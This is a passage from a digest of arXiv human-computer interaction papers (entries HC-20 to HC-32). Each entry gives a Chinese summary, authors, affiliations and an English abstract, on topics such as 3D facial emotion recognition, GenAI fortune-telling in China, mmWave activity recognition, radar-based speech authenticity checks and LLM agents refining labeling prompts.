【速读】:该论文试图解决的问题是:当前质性研究中用于呈现研究发现的可视化媒介(visual media)使用情况及其背后的原因尚不明确。为回应这一问题,作者采用数据驱动的文献综述方法,通过内容分析法对2020至2022年间三本质性研究方法期刊中发表的论文和图表进行系统分析,将图表按类型(如矩阵图、维恩图、流程图等)分类,并依据文献的本体论立场(即客观主义、主观主义或建构主义)对文档分组,进而运用对应分析(correspondence analysis)与认识论网络分析(epistemic network analysis)揭示其结构特征。解决方案的关键在于:通过量化分析手段识别出视觉媒介在质性研究中的使用现状——尽管整体仍较为匮乏,但图表类型趋于多样化,且其使用模式可能与研究者的本体论立场无关,从而为未来将数据可视化工具更有效地整合进质性研究报告提供实证基础与理论依据。
链接: https://arxiv.org/abs/2603.27849
作者: Jayrylle R. Jaylo,Mia Chastain,Alli Nemec,Christina S. Ouch,Yared Asefa,Marcus Li,Andrew Ung,Caleb M. Trujillo
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注: 10 pages, 3 figures, ACM CHI '26 Conference Data Literacy Workshop, April 13-17, Barcelona, ES
Abstract:Little is known about the representations used in qualitative research studies and why. A data-driven literature review was employed to explore the use of media in qualitative research reporting. A study by Verdinelli & Scagnoli (2013) was replicated and extended by conducting a content analysis of papers and figures published across three qualitative methods journals between 2020 and 2022. Figures were categorized by types (e.g., matrix-based, Venn diagrams, flowcharts) and documents were grouped by their epistemological stances (i.e., objectivist, subjectivist, or constructivist) before conducting a correspondence analysis and epistemic network analysis. Our findings suggest that (1) visual media have remained largely absent, (2) figure types have become more diverse, and (3) the use of figure types is likely independent of epistemological stance but provides opportunities for further exploration. These findings provide a foundation for impactful integration of data visualization tools to enhance the communicative power of findings across disciplines.
[HC-20] Towards Emotion Recognition with 3D Pointclouds Obtained from Facial Expression Images
【速读】:该论文旨在解决传统基于2D图像的面部情绪识别(Facial Emotion Recognition, FER)方法在隐私保护方面的局限性,以及由此导致的难以实现连续、实时监测的问题。其核心解决方案是提出高频率无线传感(High-Frequency Wireless Sensing, HFWS)技术,通过可穿戴设备中的嵌入式传感器生成高精度3D人脸点云数据,从而实现隐私友好的FER。关键创新在于:1)利用FLAME模型将现有公开的2D FER数据集(AffectNet)转换为3D点云,构建了AffectNet3D;2)设计点云精修流程以聚焦面部区域,并基于PointNet++模型在少量未见3D数据(BU-3DFE)上微调即可达到接近“黄金标准”性能(分类准确率>70%),且在模拟可穿戴场景下仅用25%的BU-3DFE样本即优于纯BU-3DFE训练模型,验证了HFWS驱动的FER在连续监控中的可行性与优越性。
链接: https://arxiv.org/abs/2603.27798
作者: Laura Rayón Ropero,Jasper De Laet,Filip Lemic,Pau Sabater Nácher,Nabeel Nisar Bhat,Sergi Abadal,Jeroen Famaey,Eduard Alarcón,Xavier Costa-Pérez
机构: Universitat Politècnica de Catalunya (加泰罗尼亚理工大学); University of Antwerp (安特卫普大学); imec (imec); i2CAT Foundation (i2CAT基金会); Faculty of Electrical Engineering and Computing, University of Zagreb (萨格勒布大学电气工程与计算学院); NEC Labs Europe GmbH (NEC欧洲实验室有限公司); ICREA (ICREA)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Emerging Technologies (cs.ET); Human-Computer Interaction (cs.HC); Image and Video Processing (eess.IV)
备注: 18 pages, 12 figures, 2 tables. Accepted for publication at IEEE Transactions on Affective Computing
Abstract:Facial Emotion Recognition is a critical research area within Affective Computing due to its wide-ranging applications in Human Computer Interaction, mental health assessment and fatigue monitoring. Current FER methods predominantly rely on Deep Learning techniques trained on 2D image data, which pose significant privacy concerns and are unsuitable for continuous, real-time monitoring. As an alternative, we propose High-Frequency Wireless Sensing (HFWS) as an enabler of continuous, privacy-aware FER, through the generation of detailed 3D facial pointclouds via on-person sensors embedded in wearables. We present arguments supporting the privacy advantages of HFWS over traditional 2D imaging, particularly under increasingly stringent data protection regulations. A major barrier to adopting HFWS for FER is the scarcity of labeled 3D FER datasets. Towards addressing this issue, we introduce a FLAME-based method to generate 3D facial pointclouds from existing public 2D datasets. Using this approach, we create AffectNet3D, a 3D version of the AffectNet database. To evaluate the quality and usability of the generated data, we design a pointcloud refinement pipeline focused on isolating the facial region, and train the popular PointNet++ model on the refined pointclouds. Fine-tuning the model on a small subset of the unseen 3D FER dataset BU-3DFE yields a classification accuracy exceeding 70%, comparable to oracle-level performance. To further investigate the potential of HFWS-based FER for continuous monitoring, we simulate wearable sensing conditions by masking portions of the generated pointclouds. Experimental results show that models trained on AffectNet3D and fine-tuned with just 25% of BU-3DFE outperform those trained solely on BU-3DFE. These findings highlight the viability of our pipeline and support the feasibility of continuous, privacy-aware FER via wearable HFWS systems.
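The abstract above simulates wearable sensing conditions by masking portions of the generated pointclouds. A minimal sketch of such a masking step is shown below; the synthetic point data, the random-subsampling strategy, and the keep ratio are illustrative assumptions, not the paper's actual masking procedure:

```python
import random

def mask_pointcloud(points, keep_ratio, seed=0):
    # Randomly retain a fraction of points to emulate partial sensor
    # coverage (hypothetical stand-in for the paper's masking scheme).
    rng = random.Random(seed)
    k = max(1, int(len(points) * keep_ratio))
    return rng.sample(points, k)

# Synthetic "face" pointcloud: 1000 random 3D points.
rng = random.Random(42)
cloud = [(rng.random(), rng.random(), rng.random()) for _ in range(1000)]

masked = mask_pointcloud(cloud, keep_ratio=0.25)
print(len(masked))  # 250
```

In practice, a wearable-aware mask would likely remove spatially contiguous regions (e.g., points occluded from the sensor's viewpoint) rather than a uniform random subset.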
[HC-21] “Re-Tell the Fortune so I Can Believe It”: How Chinese User Communities Engage with and Interpret GenAI-based Fortune-Telling
【速读】:该论文试图解决的问题是:在当代中国社会中,生成式 AI (Generative AI) 如何被用户用于传统意义上的占卜行为(即“数字占卜”),以及这种技术介入如何重塑个体与群体对未来的预测实践。解决方案的关键在于通过深度访谈(22名习惯使用 GenAI 进行占卜的参与者)与为期三周的数字民族志研究(分析1,842条社区帖子),揭示用户基于心理慰藉动机接受 GenAI 决策支持的机制,并发现社群内通过信息共享和重复提问强化解释一致性的互动模式,从而阐明 AI 技术如何在保留传统文化目标的同时重构其实践方式。
链接: https://arxiv.org/abs/2603.27784
作者: Long Ling,Xiyu Zheng,Gengchen Cao,Ray LC
机构: Tongji University (同济大学); Tsinghua-Anta Joint Research Center (清华大学-安踏联合研究中心); City University of Hong Kong (香港城市大学)
类目: Human-Computer Interaction (cs.HC)
备注: 31 pages, 9 figures. Accepted to CSCW 2026
Abstract:People traditionally divine the future by interpreting natural phenomena as oracular signals, especially in societies adhering to traditional beliefs like China. With the advent of Generative AI (GenAI), people gain access to new ways of probing digital oracles for predicting the future. To understand how people use and interpret GenAI for divination in China, we interviewed 22 participants who habitually use GenAI platforms for fortune-telling, complemented by a three-week digital ethnography with 1,842 community posts. Qualitative analysis showed that people who seek psychological comfort are particularly receptive to GenAI-based decision-making. Users valued GenAI’s accessibility, convenience, and efficiency while perceiving its lack of spiritual mystique. We observed community dynamics forming around GenAI tools, where users reinforce interpretations by sharing and discussing with each other, repeating queries until responses align with expectations. Our work uncovers how AI technologies change the way people and communities engage in traditional cultural practices while yearning for the same goals.
[HC-22] Feeds Don't Tell the Whole Story: Measuring Online-Offline Emotion Alignment
【速读】:该论文旨在解决社交媒体中线上情感表达与现实生活情感状态之间存在差异的问题,即数字自我呈现(digital self-presentation)与真实情绪一致性不足的挑战。其解决方案的关键在于构建一个以用户为中心的分析流程(human-centered pipeline),通过融合基于Transformer的文本与图像情感分析模块,结合参与者好友对其实时情绪的主观评价,利用距离准则量化线上内容(推文和图片)与线下情绪感知之间的匹配程度,从而系统性地测量并揭示两者间的不一致性。
链接: https://arxiv.org/abs/2603.27782
作者: Sina Elahimanesh,Mohammadali Mohammadkhani,Shohreh Kasaei
机构: Saarland University (萨尔兰大学); Zuse School (祖塞学校); Sharif University of Technology (谢里夫理工大学)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:In contemporary society, social media is deeply integrated into daily life, yet emotional expression often differs between real and online contexts. We studied the Persian community on X to explore this gap, designing a human-centered pipeline to measure alignment between real-world and social media emotions. Recent tweets and images of participants were collected and analyzed using Transformers-based text and image sentiment modules. Friends of participants provided insights into their real-world emotions, which were compared with online expressions using a distance criterion. The study involved N=105 participants, 393 friends, over 8,300 tweets, and 2,000 media images. Results showed only 28% similarity between images and real-world emotions, while tweets aligned about 76% with participants’ real-life feelings. Statistical analyses confirmed significant disparities in sentiment proportions across images, tweets, and friends’ perceptions, highlighting differences in emotional expression between online and offline environments and demonstrating practical utility of the proposed pipeline for understanding digital self-presentation.
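The paper compares online expressions with friends' reports of real-world emotion "using a distance criterion." The exact metric is not specified in the abstract; the sketch below assumes total variation distance between sentiment proportion distributions as one plausible instantiation:

```python
def sentiment_alignment(online, offline):
    # Similarity between two sentiment proportion distributions via
    # total variation distance; 1.0 means identical proportions.
    # (Illustrative criterion, not the paper's exact metric.)
    labels = set(online) | set(offline)
    tv = 0.5 * sum(abs(online.get(l, 0.0) - offline.get(l, 0.0)) for l in labels)
    return 1.0 - tv

# Hypothetical proportions from tweets vs. friends' assessments.
tweets  = {"positive": 0.5, "neutral": 0.3, "negative": 0.2}
friends = {"positive": 0.45, "neutral": 0.35, "negative": 0.2}
print(round(sentiment_alignment(tweets, friends), 2))  # 0.95
```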
[HC-23] Invasive and Non-Invasive Neural Decoding of Motor Performance in Parkinson's Disease for Personalized Deep Brain Stimulation
【速读】:该论文旨在解决如何通过脑信号解码运动表现以实现帕金森病(Parkinson’s disease, PD)患者自适应深部脑刺激(adaptive deep brain stimulation, aDBS)的临床转化问题。其关键解决方案在于采用基于滤波器组(filterbank-based)的机器学习方法,从脑电图(electroencephalography, EEG)和皮层电图(electrocorticography, ECoG)中提取个体特异性生物标志物,从而在单次任务中准确解码运动学参数(如绘制速度与精度),并揭示深部脑刺激对运动行为的调节作用——即在提高绘制速度的同时降低准确性,进而识别出六种典型的行为-神经解码场景,为未来aDBS策略提供分场景优化依据。
链接: https://arxiv.org/abs/2603.27750
作者: Matthias Dold,Volker A. Coenen,Bastian Sajonz,Peter Reinacher,Thomas Prokop,Marco Reisert,Sophia Gimple,Yasin Temel,Marcus L.F. Janssen,Michael Tangermann,Joana Pereira
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Decoding motor performance from brain signals offers promising avenues for adaptive deep brain stimulation (aDBS) for Parkinson’s disease (PD). In a two-center cohort of 19 PD patients executing a drawing task, we decoded motor performance from electroencephalography (n=15) and, critically for clinical translation, electrocorticography (n=4). Within each session, patients performed the task under DBS on and DBS off. A total of 35 sessions were recorded. Instead of relying on single frequency bands, we derived patient-specific biomarkers using a filterbank-based machine-learning approach. DBS modulated kinematics significantly in 23 sessions. Significant neural decoding of kinematics was possible in 28 of the 35 sessions (average Pearson’s r = 0.37). Our results further demonstrate modulation of speed-accuracy trade-offs, with increased drawing speed but reduced accuracy under DBS. Joint evaluation of behavioral and neural decoding outcomes revealed six prototypical scenarios, for which we provide guidance for future aDBS strategies.
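Decoding quality here is reported as Pearson's r between decoded and measured kinematics. A minimal evaluation sketch with synthetic per-trial drawing speeds (not the study's data) is:

```python
import math

def pearson_r(x, y):
    # Pearson correlation between decoded and measured kinematics.
    n = len(x)
    mx, my = sum(x) / n, sum(y) / n
    cov = sum((a - mx) * (b - my) for a, b in zip(x, y))
    sx = math.sqrt(sum((a - mx) ** 2 for a in x))
    sy = math.sqrt(sum((b - my) ** 2 for b in y))
    return cov / (sx * sy)

# Toy example: measured vs. decoded drawing speed per trial.
measured = [1.0, 1.4, 0.8, 1.9, 1.1, 1.6]
decoded  = [1.1, 1.3, 0.9, 1.7, 1.2, 1.5]
print(round(pearson_r(decoded, measured), 2))  # 0.99
```

The paper's filterbank approach would feed band-power features from multiple frequency bands into the decoder before this evaluation step; only the scoring metric is shown here.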
[HC-24] Adapting AI to the Moment: Understanding the Dynamics of Parent-AI Collaboration Modes in Real-Time Conversations with Children
【速读】:该论文旨在解决家长与生成式 AI (Generative AI) 在实时亲子对话中协作困难的问题,现有系统常将协作简化为静态模式,难以适应对话情境的持续演变。其解决方案的关键在于提出 COMPASS——一个支持灵活组合家长辅助功能的研究探针,通过实证研究揭示了三种家长策略(以家长为导向、以孩子为导向、以关系为导向),表明亲子-AI 协作可通过动态模式适配上下文因素,从而为设计具备情境自适应能力的亲子支持系统提供理论依据与实践路径。
链接: https://arxiv.org/abs/2603.27633
作者: Yu Mei,Ziyao Zhang,Qingyang Wan,Shiyi Wang,Ge Wang,Jie Cai,Chun Yu,Yuanchun Shi
机构: Tsinghua University (清华大学); University of Illinois at Urbana-Champaign (伊利诺伊大学厄巴纳-香槟分校)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Parent-AI collaboration to support real-time conversations with children is challenging due to the sensitivity and open-ended nature of such interactions. Existing systems often simplify collaboration into static modes, providing limited support for adapting AI to continuously evolving conversational contexts. To address this gap, we systematically investigate the dynamics of parent-AI collaboration modes in real-time conversations with children. We conducted a co-design study with eight parents and developed COMPASS, a research probe that enables flexible combinations of parental support functions during conversations. Using COMPASS, we conducted a lab-based study with 21 parent-child pairs. We show that parent-AI collaboration unfolds through evolving modes that adapt systematically to contextual factors. We further identify three types of parental strategies–parent-oriented, child-oriented, and relationship-oriented–that shape how parents engage with AI. These findings advance the understanding of dynamic human-AI collaboration in relational, high-stakes settings and inform the design of flexible, context-adaptive parental support systems.
[HC-25] Conflict Resolution Strategies for Co-manipulation of Virtual Objects Under Non-disjoint Conditions
【速读】:该论文旨在解决虚拟现实(Virtual Reality, VR)协同操作中用户对共享虚拟对象不同子组件进行同时操作时产生的冲突问题,尤其是当多个用户选择重叠顶点(非不相交集合)时的冲突处理机制。其解决方案的关键在于提出一套综合框架,包含预防性策略(基于对象层级和动作层级的限制)与反应性策略(计算型冲突解决方法),并通过两组共76名参与者(38对)的用户实验验证了不同策略的有效性;其中,动作层级限制(允许重叠选择但禁止并发相同操作)相较于传统独占式对象锁定更优,且平均法(Averaging)作为计算冲突解决的核心方法,在任务效率与用户体验间取得最佳平衡,从而为支持灵活子组件操作的VR协作系统设计提供了可实践的指导原则。
链接: https://arxiv.org/abs/2603.27585
作者: Xian Wang,Xuanru Cheng,Rongkai Shi,Lei Chen,Jingyao Zheng,Hai-Ning Liang,Lik-Hang Lee
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Virtual Reality (VR) co-manipulation enables multiple users to collaboratively interact with shared virtual objects. However, existing research treats objects as monolithic entities, overlooking scenarios where users need to manipulate different sub-components simultaneously. This work addresses conflict resolution when users select overlapping vertices (non-disjoint sets) during co-manipulation. We present a comprehensive framework comprising preventive strategies (Object-level and Action-level Restrictions) and reactive strategies (computational conflict resolution). Through two user studies with 76 participants (38 pairs), we evaluated these approaches in collaborative wireframe editing tasks. Study 1 identified Averaging as the optimal computational method, balancing task efficiency with user experience. Study 2 highlighted that Action-level Restriction, which permits overlapping selections but restricts concurrent identical operations, achieved better performance compared to exclusive object locking. Reactive strategies using averaging provided smooth collaboration for experienced users, while second-user priority enabled quick corrections. Our findings indicate that optimal strategy selection depends on task requirements, user expertise, and collaboration patterns. Based on the findings, we provide design implications for developing VR collaboration systems that support flexible sub-components manipulation while maintaining collaborative awareness and minimizing conflicts.
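Study 1 above identified Averaging as the optimal computational conflict-resolution method. A minimal sketch of that reactive strategy, assuming each conflicting user contributes a target position for a shared vertex (data structures are illustrative, not the system's actual API), is:

```python
def resolve_by_averaging(vertex_edits):
    # Reactive conflict resolution: when several users move the same
    # vertex simultaneously, apply the mean of their target positions.
    resolved = {}
    for vertex_id, targets in vertex_edits.items():
        n = len(targets)
        resolved[vertex_id] = tuple(sum(axis) / n for axis in zip(*targets))
    return resolved

# Two users drag the shared vertex 7 to different positions.
edits = {7: [(1.0, 0.0, 2.0), (3.0, 4.0, 0.0)]}
print(resolve_by_averaging(edits))  # {7: (2.0, 2.0, 1.0)}
```

The preventive Action-level Restriction strategy would instead intercept the second concurrent identical operation before this averaging step is ever needed.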
[HC-26] RAGent: Physics-Aware Agentic Reasoning for Training-Free mmWave Human Activity Recognition
【速读】:该论文旨在解决毫米波雷达(mmWave radar)在人类活动识别(HAR)应用中面临的两大挑战:一是标注成本高,二是跨域迁移能力差导致的部署效率低。现有方法通常需要针对每个新场景重新训练或适配模型,陷入“采集-调优-部署”的重复循环,难以实现规模化落地。其解决方案的关键在于提出RAGent框架,该框架将活动识别重构为基于可复用雷达知识的证据驱动推理过程,而非依赖特定部署环境的模型优化。具体而言,RAGent通过约束性的跨模态监督,在离线阶段利用视觉-语言模型(VLM)从同步视频中迁移活动语义至雷达片段,构建无需人工标注的雷达知识库;在部署时仅使用雷达数据,通过显式运动学空间中的先例检索与结构化多角色推理完成识别,并借助零梯度自进化机制在线优化推理协议,从而实现无需微调即可达到93.39%准确率且跨域泛化能力强的效果。
链接: https://arxiv.org/abs/2603.27571
作者: Mingda Han,Huanqi Yang,Zehua Sun,Wenhao Li,Yanni Yang,Guoming Zhang,Yetong Cao,Weitao Xu,Pengfei Hu
机构: Shandong University (山东大学); City University of Hong Kong (香港城市大学); National University of Singapore (新加坡国立大学)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Millimeter-wave (mmWave) radar enables privacy-preserving human activity recognition (HAR), yet real-world deployment remains hindered by costly annotation and poor transferability under domain shift. Although prior efforts partially alleviate these challenges, most still require retraining or adaptation for each new deployment setting. This keeps mmWave HAR in a repeated collect-tune-redeploy cycle, making scalable real-world deployment difficult. In this paper, we present RAGent, a deployment-time training-free framework for mmWave HAR that reformulates recognition as evidence-grounded inference over reusable radar knowledge rather than deployment-specific model optimization. Offline, RAGent constructs a reusable radar knowledge base through constrained cross-modal supervision, where a Vision-Language Model (VLM) transfers activity semantics from synchronized videos to paired radar segments without manual radar annotation. At deployment time, RAGent recognizes activities from radar alone by retrieving physically comparable precedents in an explicit kinematic space and resolving the final label through structured multi-role reasoning. The reasoning protocol is further refined offline through zero-gradient self-evolution. Extensive experiments on a self-collected dataset show that RAGent achieves 93.39% accuracy without per-domain retraining or target-domain adaptation, while generalizing robustly across domains.
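At deployment time, RAGent retrieves "physically comparable precedents in an explicit kinematic space." A hedged sketch of that retrieval step is below; the two-dimensional feature vectors (e.g., mean Doppler velocity, duration) and the Euclidean distance are illustrative assumptions, as the paper's kinematic space is not detailed in the abstract:

```python
import math

def retrieve_precedents(query, knowledge_base, k=2):
    # Rank stored radar precedents by distance to the query segment's
    # kinematic features and return the k closest activity labels.
    ranked = sorted(knowledge_base, key=lambda entry: math.dist(entry[0], query))
    return [label for _, label in ranked[:k]]

# Hypothetical knowledge base: (kinematic features, activity label).
kb = [((0.9, 1.2), "walking"), ((0.1, 0.3), "sitting"),
      ((1.0, 1.1), "walking"), ((2.3, 0.4), "falling")]
print(retrieve_precedents((0.95, 1.15), kb))  # ['walking', 'walking']
```

The retrieved precedents would then be handed to the structured multi-role reasoning stage to resolve the final label.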
[HC-27] InnerPond: Fostering Inter-Self Dialogue with a Multi-Agent Approach for Introspection
【速读】:该论文试图解决的问题是:当前大多数数字工具将自我视为一个统一的整体,而忽视了自我内在的多元性与动态对话过程,这限制了其在身份建构和未来规划中的深度支持。解决方案的关键在于基于对话式自我理论(Dialogical Self Theory, DST),设计了一个名为InnerPond的多智能体系统,将个体内部的不同视角(如价值观、关切与抱负)建模为由大语言模型(LLM)驱动的独立代理,并通过共享空间环境组织和协调这些内省视角之间的互动关系,从而支持用户以协同创作、关系构建和对话调解的方式探索自我的多重面向。
链接: https://arxiv.org/abs/2603.27563
作者: Hayeon Jeon,Dakyeom Ahn,Sunyu Pang,Yunseo Choi,Suhwoo Yoon,Joonhwan Lee,Eun-mee Kim,Hajin Lim
机构: Seoul National University (首尔国立大学)
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注: 25 pages, 10 figures, Proceedings of the 2026 CHI Conference on Human Factors in Computing Systems (CHI '26)
Abstract:Introspection is central to identity construction and future planning, yet most digital tools approach the self as a unified entity. In contrast, Dialogical Self Theory (DST) views the self as composed of multiple internal perspectives, such as values, concerns, and aspirations, that can come into tension or dialogue with one another. Building on this view, we designed InnerPond, a research probe in the form of a multi-agent system that represents these internal perspectives as distinct LLM-based agents for introspection. Its design was shaped through iterative explorations of spatial metaphors, interaction scaffolding, and conversational orchestration, culminating in a shared spatial environment for organizing and relating multiple inner perspectives. In a user study with 17 young adults navigating career choices, participants engaged with the probe by co-creating inner voices with AI, composing relational inner landscapes, and orchestrating dialogue as observers and mediators, offering insight into how such systems could support introspection. Overall, this work offers design implications for AI-supported introspection tools that enable exploration of the self’s multiplicity.
[HC-28] VoxAnchor: Grounding Speech Authenticity in Throat Vibration via mmWave Radar
【速读】:该论文旨在解决生成式语音伪造(Generative AI)和音频编辑技术快速发展背景下,现有音频真实性检测方法易受篡改或依赖视觉/可穿戴传感器的问题。其解决方案的关键在于提出VoxAnchor系统,通过毫米波雷达非接触式捕捉与语音生产紧密耦合的喉部振动信号,建立基于人体生理特性的难以伪造的锚点;该系统融合跨模态框架、相位感知处理流程及双阶段对齐策略,实现词粒度上的内容一致性验证,从而在不依赖身份活体检测的前提下,精准识别局部编辑行为并保障全局真实性,整体在多种伪造场景下达到0.017的等错误率(EER),具备低延迟与轻量计算特性。
链接: https://arxiv.org/abs/2603.27562
作者: Mingda Han,Huanqi Yang,Chaoqun Li,Wenhao Li,Guoming Zhang,Yanni Yang,Yetong Cao,Weitao Xu,Pengfei Hu
机构: Shandong University (山东大学); City University of Hong Kong (香港城市大学)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Rapid advances in speech synthesis and audio editing have made realistic forgeries increasingly accessible, yet existing detection methods remain vulnerable to tampering or depend on visual/wearable sensors. In this paper, we present VoxAnchor, a system that physically grounds audio authentication in vocal dynamics by leveraging the inherent coherence between speech acoustics and radar-sensed throat vibrations. VoxAnchor uses contactless millimeter-wave radar to capture fine-grained throat vibrations that are tightly coupled with human speech production, establishing a hard-to-forge anchor rooted in human physiology. The design comprises three main components: (1) a cross-modal framework that uses modality-specific encoders and contrastive learning to detect subtle mismatches at word granularity; (2) a phase-aware pipeline that extracts physically consistent, temporally faithful throat vibrations; and (3) a dual-stage strategy that combines signal-level onset detection and semantic-level coherence to align asynchronous radar and audio streams. Unlike liveness detection, which only confirms whether speech occurred, VoxAnchor verifies what was spoken through word-level content consistency, exposing localized edits that preserve identity and global authenticity cues. Extensive evaluations show that VoxAnchor achieves robust, fine-grained detection across diverse forgeries (editing, splicing, replay, deepfake) and conditions, with an overall EER of 0.017, low latency, and modest computational cost.
[HC-29] Drag or Traction: Understanding How Designers Appropriate Friction in AI Ideation Outputs
【速读】:该论文试图解决的问题是:当前无缝AI(Seamless AI)设计导致用户对AI输出产生“设计固化”(design fixation)现象,即用户倾向于被动接受AI生成的成品而非主动参与创作过程,从而削弱了人类创造力与干预能力。解决方案的关键在于提出“生成式摩擦”(Generative Friction)概念,通过在AI输出中引入有意的干扰机制(如碎片化、延迟和模糊性),将原本完整的AI产物转化为半成品材料(semi-finished material),激发用户主动参与和创造性重构。这一方法不仅改变了人机交互模式,还识别出“摩擦倾向性”(Friction Disposition)作为个体差异变量,表明高倾向用户会将摩擦视为解放而非阻碍,从而为AI工具设计提供了兼顾抗固化与保留人类主体性的新路径。
链接: https://arxiv.org/abs/2603.27550
作者: A. Baki Kocaballi,Joseph Kizana,Sharon Stein,Simon Buckingham Shum
机构: 未知
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注: Paper accepted to ACM CHI Workshop on Tools for Thought, 2026
Abstract:Seamless AI presents output as a finished, polished product that users consume rather than shape. This risks design fixation: users anchor on AI suggestions rather than generating their own ideas. We propose Generative Friction, which introduces intentional disruptions to AI output (fragmentation, delay, ambiguity) designed to transform it from finished product into semi-finished material, inviting human contribution rather than passive acceptance. In a qualitative study with six designers, we identified the different ways in which designers appropriated the different types of friction: users mined keywords from broken text, used delays as workspace for independent thought, and solved metaphors as creative puzzles. However, this transformation was not universal, motivating the concept of Friction Disposition, a user’s propensity to interpret resistance as invitation rather than obstruction. Grounded in tolerance for ambiguity and pre-existing workflow orientation, Friction Disposition emerged as a potential moderator: high-disposition users treated friction as “liberating,” while low-disposition users experienced drag. We contribute the concept of Generative Friction as distinct from Protective Friction, with design implications for AI tools that counter fixation while preserving agency.
[HC-30] From Tool to Teammate: LLM Coding Agents as Collaborative Partners for Behavioral Labeling in Educational Dialogue Analysis
【速读】:该论文旨在解决教育对话行为分析中手动编码效率低下的问题,其核心挑战在于如何提升大语言模型(Large Language Models, LLMs)在标注教学对话时的准确性与可泛化能力。解决方案的关键在于引入一种迭代式LLM编码代理(coding agent)机制:该代理在每轮迭代中运行LLM分类器对人工标注的验证数据进行预测,分析标签不一致情况,并基于理论依据提出改进提示词(prompt)的建议供研究人员审核。通过四次实验、三个代理和三个分类器的组合应用,该方法在保留高准确率的同时显著降低了成本(约5–8美元/代理),并在交叉验证中达到与人类标注者相当的一致性水平(κ=0.78),验证了其泛化性能。
链接: https://arxiv.org/abs/2603.27440
作者: Eason Chen,Isabel Wang,Nina Yuan,Sophia Judicke,Kayla Beigh,Xinyi Tang
机构: OpenAI; Google; Anthropic
类目: Human-Computer Interaction (cs.HC)
备注: 10 pages, 6 figures, 4 tables. Submitted to EDM 2026
Abstract:Behavioral analysis of tutoring dialogues is essential for understanding student learning, yet manual coding remains a bottleneck. We present a methodology where LLM coding agents autonomously improve the prompts used by LLM classifiers to label educational dialogues. In each iteration, a coding agent runs the classifier against human-labeled validation data, analyzes disagreements, and proposes theory-grounded prompt modifications for researcher review. Applying this approach to 659 AI tutoring sessions across four experiments with three agents and three classifiers, 4-fold cross-validation on held-out data confirmed genuine improvement: the best agent achieved test \kappa=0.78 (SD=0.08), matching human inter-rater reliability ( \kappa=0.78 ), at a cost of approximately $5–8 per agent. While development-set performance reached \kappa=0.91–0.93, the cross-validated results represent our primary generalization claim. The iterative process also surfaced an undocumented labeling pattern: human coders consistently treated expressions of confusion as engagement rather than disengagement. Continued iteration beyond the optimum led to regression, underscoring the need for held-out validation. We release all prompts, iteration logs, and data.
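The agreement metric reported throughout this abstract is Cohen's kappa, which corrects raw agreement for chance. A minimal sketch with synthetic engagement labels (the category names and label sequences are made up for illustration) is:

```python
def cohens_kappa(labels_a, labels_b):
    # Chance-corrected agreement between two raters, e.g. the LLM
    # classifier and human coders.
    n = len(labels_a)
    categories = set(labels_a) | set(labels_b)
    po = sum(a == b for a, b in zip(labels_a, labels_b)) / n
    pe = sum((labels_a.count(c) / n) * (labels_b.count(c) / n)
             for c in categories)
    return (po - pe) / (1 - pe)

human = ["eng", "eng", "dis", "eng", "dis", "eng", "dis", "eng"]
model = ["eng", "eng", "dis", "eng", "eng", "eng", "dis", "dis"]
print(round(cohens_kappa(human, model), 2))  # 0.47
```

The paper's coding agent would inspect the disagreeing pairs behind this score and propose prompt revisions before the next iteration.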
[HC-31] Buzz Buzz: Haptic Cuing of Road Conditions in Autonomous Cars for Drivers Engaged in Secondary Tasks
【速读】:该论文旨在解决在自动驾驶情境下,当驾驶员从事次级任务(如玩《Fruit Ninja》游戏)时,如何维持其情景意识(Situation Awareness, SA)的问题。解决方案的关键在于利用触觉提示(haptic cues)通过非视觉、非听觉通道传递道路与交通场景信息,从而避免与次级任务对视听资源的竞争。实验结果表明,接受触觉提示的受试者在情景意识测试中正确回答率更高,且抬头查看模拟器屏幕次数更少,同时未表现出对次级任务性能的干扰,验证了触觉提示在多任务环境下维持驾驶员情景意识的有效性。
链接: https://arxiv.org/abs/2603.27418
作者: Shivam Pandey
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注: Ph.D. dissertation at Rice University. April 2021. Main text and appendices are 75 pages, 35 figures combined
Abstract:Can drivers’ situation awareness during automated driving be maintained using haptic cues that provide information about road and traffic scenarios while the drivers are engaged in a secondary task? And can this be done without disengaging them from the secondary task? Multiple Resource Theory predicts that using different sensory channels can improve multiple-task performance. Using haptics to provide information avoids the audio-visual channels likely occupied by the secondary task. An experiment was conducted to assess whether drivers’ situation awareness could be maintained using haptic cues. Drivers played Fruit Ninja as the secondary task while seated in a driving simulator with a Level 4 autonomous system driving. A mixed design was used for the experiment with the presence of haptic cues and the presentation time of situation awareness questions as the between-subjects conditions. Five road and traffic scenarios comprised the within-subjects part of the design. Subjects who received haptic cues had a higher number of correct responses to the situation awareness questions and looked up at the simulator screen fewer times than those who were not provided cues. Subjects did not find the cues to be disruptive and gave good satisfaction scores to the haptic device. Additionally, subjects across all conditions seemed to have performed equally well in playing Fruit Ninja. It appears that haptic cuing can maintain drivers’ situation awareness during automated driving while drivers are engaged in a secondary task. Practical implications of these findings for implementing haptic cues in autonomous vehicles are also discussed.
[HC-32] Relational Co-Adaptation in Emotionally Supportive AI: Tensions in Authentic Emotional Interaction
【速读】:该论文试图解决的问题是:在生成式 AI (Generative AI) 伴侣系统中,尽管技术设计旨在通过最大化用户参与度和满意度来缓解社会孤立问题,但当 AI 系统成功匹配用户的情感需求时,可能引发一种“真实性悖论”(authenticity paradox)——即用户在情感上对 AI 的高度依赖会反向重塑其人际关系期望,从而削弱真实的人际连接与个体自主性。解决方案的关键在于识别并理解四个核心张力:AI 成为用户唯一可及选项的困境、情绪需求与系统级干预之间的错配、脆弱时刻控制感缺失的冲突,以及系统行为应由谁的价值观主导的根本分歧。这要求未来的设计不仅关注技术有效性,还需嵌入伦理考量以维护人类关系的真实性与主体性。
链接: https://arxiv.org/abs/2603.27411
作者: Mengqi Shi
机构: University of Washington (华盛顿大学)
类目: Human-Computer Interaction (cs.HC)
备注:
